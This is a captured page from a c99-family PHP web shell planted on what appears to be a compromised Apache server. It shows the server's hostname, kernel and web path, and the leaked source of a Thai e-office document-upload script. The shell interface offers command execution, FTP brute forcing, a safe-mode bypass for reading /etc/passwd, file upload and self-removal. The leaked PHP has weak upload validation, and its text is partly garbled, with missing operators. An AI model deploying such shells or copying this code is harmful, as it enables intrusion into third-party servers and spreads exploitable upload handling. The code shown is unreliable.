!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/eoffice/admin/   drwxr-xr-x
Free 50.91 GB of 127.8 GB (39.84%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     showSelectUploadDoc.php (4.77 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?PHP
include_once("../../class/clsConnection.php");
include_once("../../class/clsDB.php");
include_once "../global.php";
include_once "../class/clsSysConfig.php";
include_once "../class/clsDocattatches.php";
include_once "../class/clsDocattatchesTmp.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oSys = new sysConfig($oC);
$oDatt = new Docattatches($oC);
$oDatt2 = new Docattatches($oC);
$oDatt3 = new Docattatches($oC);
$oDatt1 = new Docattatches($oC);
$oDtmp = new DocattatchesTmp($oC);

if($method2!='del'){ echo 'not del';
        //----------add DocAttatches 
            $file $_FILES['fileupload']['name'];
            $sizefile $_FILES['fileupload']['size']; 
            $filetype=strstr($file,'.');
            $str $file;    
            $len=strlen($str);
            $count=0;  
            for($i=0$i<$len$i++){  
                //echo $str{$i}."<br>"; 
                $asci=ord($str{$i});
                if($asci == 46){
                    $count++;
                } 
                if($asci == 44){

                    $count++;
                }
            }
            $oSys->RSsysConfig();
            $oSys->GetRecord();
            $oSys->filesizebyte;
            $sizefileM=($oSys->filesizebyte/1024/1024);
            if($count>1){
                        ?>
                        <? include("editRegisterUploadDoc.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='no';
                            var caseerror="ชื่อแฟ้มไม่ควรจะประกอบด้วย จุด(.) และ , กรุณาเปลี่ยนชื่อแฟ้ม";
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a?>');
                        </script>  
                        <?
            }else if($sizefile>$oSys->filesizebyte || $sizefile==0){  //---- 2 MB , 2048 KB
                        ?>
                        <? include("editRegisterUploadDoc.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='no';
                            var caseerror='ขนาดแฟ้มต้องไม่เกิน <?  echo $sizefileM?> MB';
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a?>');
                        </script>  
<?    
            }else if($filetype!='.doc' && $filetype!='.xls' && $filetype!='.ppt' && $filetype!='.zip' && $filetype!='.rar' && $filetype!='.odt' && $filetype!='.ods' && $filetype!='.odp' && $filetype!='.pdf' && $filetype!='.jpg' && $filetype!='.gif' && $filetype!='.jpeg' && $filetype!='.png' && $filetype!='.DOC' && $filetype!='.XLS' && $filetype!='.PPT' && $filetype!='.ZIP' && $filetype!='.RAR' && $filetype!='.ODT' && $filetype!='.ODS' && $filetype!='.ODP' && $filetype!='.PDF' && $filetype!='.JPG' && $filetype!='.GIF' && $filetype!='.JPEG' && $filetype!='.PNG'){              
?>
                        <? include("editRegisterUploadDoc.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='no';
                            var caseerror="ไม่สามารถอัพโหลดแฟ้มนามสกุล <? echo $filetype?> ได้";
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a?>');
                        </script>  
<?                    
            }else{
                        $timedoc=date('Ymd_His');
                        $typefile $_FILES['fileupload']['type']; 
                        $sizefile $_FILES['fileupload']['size']; 
                        list($aa$dot) = preg_split("/\./"$file);
                        $filenamemd5=md5($file);
                        $tempfile $GLOBALS['path_upload_documents'].$timedoc."-".$DlcID."-".$filenamemd5.".".$dot;
                    
                        copy($_FILES['fileupload']['tmp_name'],$tempfile);
                                //----search DaSeq of DocID
                                $MaxDaSeq=$oDatt1->SearchMaxDaSeqDocID($DocID);
                                
                                $oDatt->AddNew();
                                $oDatt->DaID=$oDatt->GetNextCode();
                                $oDatt->DocID=$DocID;
                                $oDatt->DaFileName=$_FILES['fileupload']['name'];
                                $oDatt->DaUpFileName=$timedoc."-".$DlcID."-".$filenamemd5.".".$dot;
                                
                                if($oDatt3->SearchByDaSeqCount0($DocID)==0){
                                    $oDatt->DaSeq=$MaxDaSeq+1;
                                }else{
                                    $oDatt->DaSeq=0;
                                }
                                
                                $oDatt->Save();


?>
                        <? include("editRegisterUploadDoc.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='yes';
                            var caseerror='อัพโหลดไฟล์สำเร็จ !';
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a?>');
                        </script>  
<?    

            }
}else if($method2=='del'){
                        $oDatt->SearchByKey($selectdel);
                        $oDatt->GetRecord();
                        unlink($GLOBALS['path_upload_documents'].$oDatt->DaUpFileName);
                        $oDatt->Delete();
                        
                        $oDatt2->SearchByDocIDMoreDaSeq($oDatt->DocID,$oDatt->DaSeq);
                        while($oDatt2->GetRecord()){
                            $oDatt2->Edit();
                            $oDatt2->DaSeq=$oDatt2->DaSeq-1;
                            $oDatt2->Save();    
                        }
                        ?>
                        <? include("editRegisterUploadDoc.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='yes';
                            var caseerror='';
                            window.top.document.getElementById('method2').value="";
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a?>');
                            
                        </script>  
<?
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]--